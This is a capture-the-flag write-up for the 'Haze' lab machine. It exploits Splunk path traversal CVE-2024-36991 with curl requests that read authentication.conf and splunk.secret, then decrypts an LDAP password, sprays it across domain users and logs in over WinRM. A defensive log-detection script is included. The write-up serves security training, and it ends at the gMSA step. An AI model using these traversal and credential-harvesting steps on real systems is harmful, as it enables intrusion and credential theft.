HTB | Haze

Machine - https://app.hackthebox.com/machines/Haze

IP - 10.10.11.61

NMAP

└─$ nmap -sC -sV -p 53,88,135,139,445,464,593,636,3268,3269,5985,8000,8088,8089,47001,49664,49665,49666,49667,49668,57704,57708,57712,57756 10.10.11.61 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-21 10:26 IST
Nmap scan report for haze.htb (10.10.11.61)
Host is up (0.59s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-21 12:56:11Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp  open  http          Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://haze.htb:8000/en-US/account/login?return_to=%2Fen-US%2F
8088/tcp  open  ssl/http      Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
8089/tcp  open  ssl/http      Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: splunkd
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
57704/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
57708/tcp open  msrpc         Microsoft Windows RPC
57712/tcp open  msrpc         Microsoft Windows RPC
57756/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-06-21T12:57:18
|_  start_date: N/A
|_clock-skew: 7h59m57s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.29 seconds

Port 53

└─$ dig ANY haze.htb @10.10.11.61     

; <<>> DiG 9.20.8-6-Debian <<>> ANY haze.htb @10.10.11.61
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 30082
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;haze.htb.                      IN      ANY

;; ANSWER SECTION:
haze.htb.               600     IN      A       10.10.11.61
haze.htb.               3600    IN      NS      dc01.haze.htb.
haze.htb.               3600    IN      SOA     dc01.haze.htb. hostmaster.haze.htb. 113 900 600 86400 3600

;; ADDITIONAL SECTION:
dc01.haze.htb.          3600    IN      A       10.10.11.61

;; Query time: 471 msec
;; SERVER: 10.10.11.61#53(10.10.11.61) (TCP)
;; WHEN: Sat Jun 21 10:15:11 IST 2025
;; MSG SIZE  rcvd: 135

Port 8000

└─$ whatweb -v -a 3 http://10.10.11.61:8000/                                                        
WhatWeb report for http://10.10.11.61:8000/
Status    : 303 See Other
Title     : 303 See Other
IP        : 10.10.11.61
Country   : RESERVED, ZZ

Summary   : HTML5, HTTPServer[Splunkd], Meta-Refresh-Redirect[http://10.10.11.61:8000/en-US/], RedirectLocation[http://10.10.11.61:8000/en-US/], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN]

Detected Plugins:
[ HTML5 ]
        HTML version 5, detected by the doctype declaration 

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        String       : Splunkd (from server string)

[ Meta-Refresh-Redirect ]
        Meta refresh tag is a deprecated URL element that can be 
        used to optionally wait x seconds before reloading the 
        current page or loading a new page. More info: 
        https://secure.wikimedia.org/wikipedia/en/wiki/Meta_refresh 

        String       : http://10.10.11.61:8000/en-US/

[ RedirectLocation ]
        HTTP Server string location. used with http-status 301 and 
        302 

        String       : http://10.10.11.61:8000/en-US/ (from location)

[ UncommonHeaders ]
        Uncommon HTTP server headers. The blacklist includes all 
        the standard headers and many non standard but common ones. 
        Interesting but fairly common headers should have their own 
        plugins, eg. x-powered-by, server and x-aspnet-version. 
        Info about headers can be found at www.http-stats.com 

        String       : x-content-type-options (from headers)

[ X-Frame-Options ]
        This plugin retrieves the X-Frame-Options value from the 
        HTTP header. - More Info: 
        http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
        aspx

        String       : SAMEORIGIN

HTTP Headers:
        HTTP/1.1 303 See Other
        Date: Sat, 21 Jun 2025 12:59:37 GMT
        Content-Type: text/html; charset=UTF-8
        X-Content-Type-Options: nosniff
        Content-Length: 335
        Location: http://10.10.11.61:8000/en-US/
        Vary: Accept-Language
        Connection: Close
        X-Frame-Options: SAMEORIGIN
        Server: Splunkd

WhatWeb report for http://10.10.11.61:8000/en-US/
Status    : 303 See Other
Title     : <None>
IP        : 10.10.11.61
Country   : RESERVED, ZZ

Summary   : Cookies[session_id_8000], HTTPServer[Splunkd], HttpOnly[session_id_8000], RedirectLocation[http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN]

Detected Plugins:
[ Cookies ]
        Display the names of cookies in the HTTP headers. The 
        values are not returned to save on space. 

        String       : session_id_8000

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        String       : Splunkd (from server string)

[ HttpOnly ]
        If the HttpOnly flag is included in the HTTP set-cookie 
        response header and the browser supports it then the cookie 
        cannot be accessed through client side script - More Info: 
        http://en.wikipedia.org/wiki/HTTP_cookie 

        String       : session_id_8000

[ RedirectLocation ]
        HTTP Server string location. used with http-status 301 and 
        302 

        String       : http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F (from location)

[ UncommonHeaders ]
        Uncommon HTTP server headers. The blacklist includes all 
        the standard headers and many non standard but common ones. 
        Interesting but fairly common headers should have their own 
        plugins, eg. x-powered-by, server and x-aspnet-version. 
        Info about headers can be found at www.http-stats.com 

        String       : x-content-type-options (from headers)

[ X-Frame-Options ]
        This plugin retrieves the X-Frame-Options value from the 
        HTTP header. - More Info: 
        http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
        aspx

        String       : SAMEORIGIN

HTTP Headers:
        HTTP/1.1 303 See Other
        Date: Sat, 21 Jun 2025 12:59:39 GMT
        Content-Type: text/html;charset=utf-8
        X-Content-Type-Options: nosniff
        Content-Length: 125
        Content-Encoding: gzip
        Vary: Accept-Encoding, Cookie
        Connection: Close
        X-Frame-Options: SAMEORIGIN
        Location: http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
        Set-Cookie: session_id_8000=006a3b11cccd0a0dc7b568b4b2a155621fcb01cc; expires=Sat, 21 Jun 2025 13:59:39 GMT; HttpOnly; Max-Age=3600; Path=/
        Server: Splunkd

WhatWeb report for http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
Status    : 200 OK
Title     : <None>
IP        : 10.10.11.61
Country   : RESERVED, ZZ

Summary   : Bootstrap, Cookies[cval,splunkweb_uid], HTML5, HTTPServer[Splunkd], Meta-Author[Splunk Inc.], Script[text/json], probably Splunk, UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=edge]

Detected Plugins:
[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with 
        HTML, CSS, and JS. 

        Website     : https://getbootstrap.com/

[ Cookies ]
        Display the names of cookies in the HTTP headers. The 
        values are not returned to save on space. 

        String       : cval
        String       : splunkweb_uid

[ HTML5 ]
        HTML version 5, detected by the doctype declaration 

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        String       : Splunkd (from server string)

[ Meta-Author ]
        This plugin retrieves the author name from the meta name 
        tag - info: 
        http://www.webmarketingnow.com/tips/meta-tags-uncovered.html
        #author

        String       : Splunk Inc.

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 

        String       : text/json

[ Splunk ]
        Splunk indexes and makes searchable data from any app, 
        server or network device in real time including logs, 
        config files, messages, alerts, scripts and metrics. 

        Certainty    : probably
        Google Dorks: (1)
        Website     : http://www.splunk.com

[ UncommonHeaders ]
        Uncommon HTTP server headers. The blacklist includes all 
        the standard headers and many non standard but common ones. 
        Interesting but fairly common headers should have their own 
        plugins, eg. x-powered-by, server and x-aspnet-version. 
        Info about headers can be found at www.http-stats.com 

        String       : x-content-type-options (from headers)

[ X-Frame-Options ]
        This plugin retrieves the X-Frame-Options value from the 
        HTTP header. - More Info: 
        http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
        aspx

        String       : SAMEORIGIN

[ X-UA-Compatible ]
        This plugin retrieves the X-UA-Compatible value from the 
        HTTP header and meta http-equiv tag. - More Info: 
        http://msdn.microsoft.com/en-us/library/cc817574.aspx 

        String       : IE=edge
        String       : IE=edge

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Sat, 21 Jun 2025 12:59:41 GMT
        Expires: Thu, 26 Oct 1978 00:00:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate, max-age=0
        Content-Type: text/html; charset=UTF-8
        X-Content-Type-Options: nosniff
        Content-Length: 4318
        Content-Encoding: gzip
        Vary: Accept-Encoding, Cookie
        Connection: Close
        Set-Cookie: cval=1829136398; Path=/en-US/account/
        X-UA-Compatible: IE=edge
        Set-Cookie: splunkweb_uid=E67A8998-46AC-43B4-B3E3-4BB25F187161; Path=/en-US/account; Max-Age=157680000; Expires=Thu, 20 Jun 2030 12:59:41 GMT
        X-Frame-Options: SAMEORIGIN
        Server: Splunkd

This looks like a Splunk server. Let’s visit the site.

Foothold/shell

Shell as edward.martin

CVE-2024-36991

Looking for a known vulnerability in Splunk, we found CVE-2024-36991.

In Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows. This vulnerability should only affect Splunk Enterprise on Windows.

Let’s try to read some files through it.

http://10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd

We found password hashes for admin, edward, mark and paul.
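From the defender’s side, the request pattern used above (a path under /modules/messaging/ carrying C:../ or ../ segments) is easy to spot in Splunk Web’s access log. The following is an added detection example for this writeup, not code from the original post or from Splunk; it assumes the common-log-format prefix Splunk writes to web_access.log and uses constructed sample lines.

```python
"""Detect CVE-2024-36991 style path traversal requests in Splunk Web access logs.

Added example, not part of the original writeup. Assumes the access log lines
start with a common-log-format prefix (client - - [timestamp] "METHOD path HTTP/x" status),
as Splunk writes to $SPLUNK_HOME/var/log/splunk/web_access.log.
"""
import re
from urllib.parse import unquote

# Access-log prefix: client, ident, user, [timestamp], "METHOD path HTTP/x", status
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# A traversal segment: ".." with an optional drive-letter prefix (C:..), bounded by '/'
TRAVERSAL_RE = re.compile(r'(?:^|/)(?:[A-Za-z]:)?\.\.(?=/|$)')


def normalise_path(raw: str) -> str:
    """URL-decode up to twice (catches double encoding) and unify separators."""
    path = raw
    for _ in range(2):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # Drop the query string and treat backslashes like forward slashes.
    return path.split('?', 1)[0].replace('\\', '/')


def is_messaging_traversal(raw_path: str) -> bool:
    """True when the request targets /modules/messaging/ with a traversal segment."""
    path = normalise_path(raw_path)
    if '/modules/messaging/' not in path.lower():
        return False
    return TRAVERSAL_RE.search(path) is not None


def scan_web_access_log(lines):
    """Return one finding per suspicious request: source, timestamp, status, file read."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_messaging_traversal(m.group('path')):
            continue
        path = normalise_path(m.group('path'))
        # The file the attacker asked for is whatever follows the last traversal segment.
        target = TRAVERSAL_RE.split(path)[-1].lstrip('/')
        findings.append({
            'src': m.group('src'),
            'ts': m.group('ts'),
            'status': int(m.group('status')),
            'target': target,
        })
    return findings


# Constructed sample lines (not real log data from the machine).
SAMPLE_LOG = [
    '10.10.14.5 - - [21/Jun/2025:12:59:41.000 +0000] "GET /en-US/account/login?return_to=%2Fen-US%2F HTTP/1.1" 200 4318 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [21/Jun/2025:13:01:02.000 +0000] "GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1" 200 1024 "-" "curl/8.5.0"',
    '10.10.14.5 - - [21/Jun/2025:13:02:17.000 +0000] "GET /en-US/modules/messaging/C%3A..%2FC%3A..%2FSplunk/etc/auth/splunk.secret HTTP/1.1" 200 256 "-" "curl/8.5.0"',
    '10.10.14.9 - - [21/Jun/2025:13:03:00.000 +0000] "GET /en-US/modules/messaging/Messenger.js HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for f in scan_web_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} status={f['status']} read {f['target']}")
```

A 200 status on such a request is the strongest signal that the instance is unpatched and the file was actually served.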

Let’s try to crack these with hashcat.

It did not work.

Let’s look for Splunk config files (refer to this).

└─$ curl http://10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../Splunk/etc/system/local/authentication.conf 
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0

[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP

Here we find the bindDNpassword for Paul.

Auth as Paul.Taylor

According to this discussion, we can decrypt the password if we have splunk.secret.

A simple Google search tells us the path is $SPLUNK_HOME/etc/auth/splunk.secret, and we can curl that too.

└─$ curl http://10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../Splunk/etc/auth/splunk.secret  
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD                  

We found the splunksecrets tool, which works with Splunk secrets offline.

└─$ splunksecrets splunk-decrypt --splunk-secret splunk.secret 
Ciphertext: $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
Ld@p_Auth_Sp1unk@2k24

And we now have Paul’s credentials.

Let’s see whether we can use SMB or WinRM with them.

└─$ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24'
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.61     445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24 
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Haze]
└─$ netexec winrm 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24'
WINRM       10.10.11.61     5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.11.61     5985   DC01             [-] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24

Since we can authenticate over SMB with Paul’s credentials, let’s enumerate users and shares.

┌──(anurag㉿anurag)-[~/htb/Haze]
└─$ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --users
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.61     445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24 
SMB         10.10.11.61     445    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.10.11.61     445    DC01             paul.taylor                   2025-06-21 15:12:44 0        
SMB         10.10.11.61     445    DC01             [*] Enumerated 1 local users: HAZE
┌──(anurag㉿anurag)-[~/htb/Haze]
└─$ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --shares
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.61     445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24 
SMB         10.10.11.61     445    DC01             [*] Enumerated shares
SMB         10.10.11.61     445    DC01             Share           Permissions     Remark
SMB         10.10.11.61     445    DC01             -----           -----------     ------
SMB         10.10.11.61     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.61     445    DC01             C$                              Default share
SMB         10.10.11.61     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.61     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.61     445    DC01             SYSVOL          READ            Logon server share 
                                                                                                          
└─$ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.61     445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24 
SMB         10.10.11.61     445    DC01             498: HAZE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             500: HAZE\Administrator (SidTypeUser)
SMB         10.10.11.61     445    DC01             501: HAZE\Guest (SidTypeUser)
SMB         10.10.11.61     445    DC01             502: HAZE\krbtgt (SidTypeUser)
SMB         10.10.11.61     445    DC01             512: HAZE\Domain Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             513: HAZE\Domain Users (SidTypeGroup)
SMB         10.10.11.61     445    DC01             514: HAZE\Domain Guests (SidTypeGroup)
SMB         10.10.11.61     445    DC01             515: HAZE\Domain Computers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             516: HAZE\Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             517: HAZE\Cert Publishers (SidTypeAlias)
SMB         10.10.11.61     445    DC01             518: HAZE\Schema Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             519: HAZE\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             520: HAZE\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.61     445    DC01             521: HAZE\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             522: HAZE\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             525: HAZE\Protected Users (SidTypeGroup)
SMB         10.10.11.61     445    DC01             526: HAZE\Key Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             527: HAZE\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             553: HAZE\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.61     445    DC01             571: HAZE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.61     445    DC01             572: HAZE\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.61     445    DC01             1000: HAZE\DC01$ (SidTypeUser)
SMB         10.10.11.61     445    DC01             1101: HAZE\DnsAdmins (SidTypeAlias)
SMB         10.10.11.61     445    DC01             1102: HAZE\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1103: HAZE\paul.taylor (SidTypeUser)
SMB         10.10.11.61     445    DC01             1104: HAZE\mark.adams (SidTypeUser)
SMB         10.10.11.61     445    DC01             1105: HAZE\edward.martin (SidTypeUser)
SMB         10.10.11.61     445    DC01             1106: HAZE\alexander.green (SidTypeUser)
SMB         10.10.11.61     445    DC01             1107: HAZE\gMSA_Managers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1108: HAZE\Splunk_Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1109: HAZE\Backup_Reviewers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1110: HAZE\Splunk_LDAP_Auth (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1111: HAZE\Haze-IT-Backup$ (SidTypeUser)
SMB         10.10.11.61     445    DC01             1112: HAZE\Support_Services (SidTypeGroup)

I will copy the SidTypeUser entries and print the names.

└─$ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep -i 'user' | sed -E 's/.*HAZE\\([^ ]+).*/\1/' > username.txt   
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Haze]
└─$ cat username.txt 
Administrator
Guest
krbtgt
Domain
Protected
DC01$
paul.taylor
mark.adams
edward.martin
alexander.green
Haze-IT-Backup$

Let’s spray Paul’s password across the user list and see whether anyone is reusing it.

└─$ netexec smb 10.10.11.61 -u username.txt -p 'Ld@p_Auth_Sp1unk@2k24' --continue-on-success
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.61     445    DC01             [-] haze.htb\Administrator:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] haze.htb\Guest:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] haze.htb\krbtgt:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] haze.htb\Domain:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] haze.htb\Protected:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         10.10.11.61     445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24 
SMB         10.10.11.61     445    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 
SMB         10.10.11.61     445    DC01             [-] haze.htb\edward.martin:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] haze.htb\alexander.green:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] haze.htb\Haze-IT-Backup$:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 

mark.adams is also using Paul’s password.

Auth as Mark.Adams

I can WinRM in as Mark.

└─$ netexec winrm 10.10.11.61 -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24'
WINRM       10.10.11.61     5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.11.61     5985   DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 (Pwn3d!)

And we are in as Mark.

Mark is a member of the gMSA_Managers group.

*Evil-WinRM* PS C:\Users\mark.adams> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                         Attributes
=========================================== ================ =========================================== ==================================================
Everyone                                    Well-known group S-1-1-0                                     Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                    Mandatory group, Enabled by default, Enabled group
HAZE\gMSA_Managers                          Group            S-1-5-21-323145914-28650650-2368316563-1107 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448
*Evil-WinRM* PS C:\Users\mark.adams> 

Bloodhound

Let’s collect the domain with bloodhound-python.

└─$ bloodhound-python -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24'  -d HAZE.htb -ns 10.10.11.61 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 8 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 01M 52S
INFO: Compressing output into 20250621221004_bloodhound.zip

We can see MARK.ADAMS@HAZE.HTB -> MemberOf -> GMSA_MANAGERS@HAZE.HTB

A Group Managed Service Account (gMSA) is a special type of Active Directory (AD) account that administrators use to run automated services securely. Microsoft introduced it in Windows Server 2012 to solve the common problem of managing service account passwords. Unlike traditional service accounts, where administrators often set passwords manually and rarely update them, gMSAs allow Active Directory to manage passwords automatically. Reference: https://www.hackingarticles.in/readgmsapassword-attack/

GMSA_Managers

Currently, Mark does not have permission to read the gMSA password.

└─$ netexec ldap 10.10.11.61 -u mark.adams  -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
LDAP        10.10.11.61     389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
LDAPS       10.10.11.61     636    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 
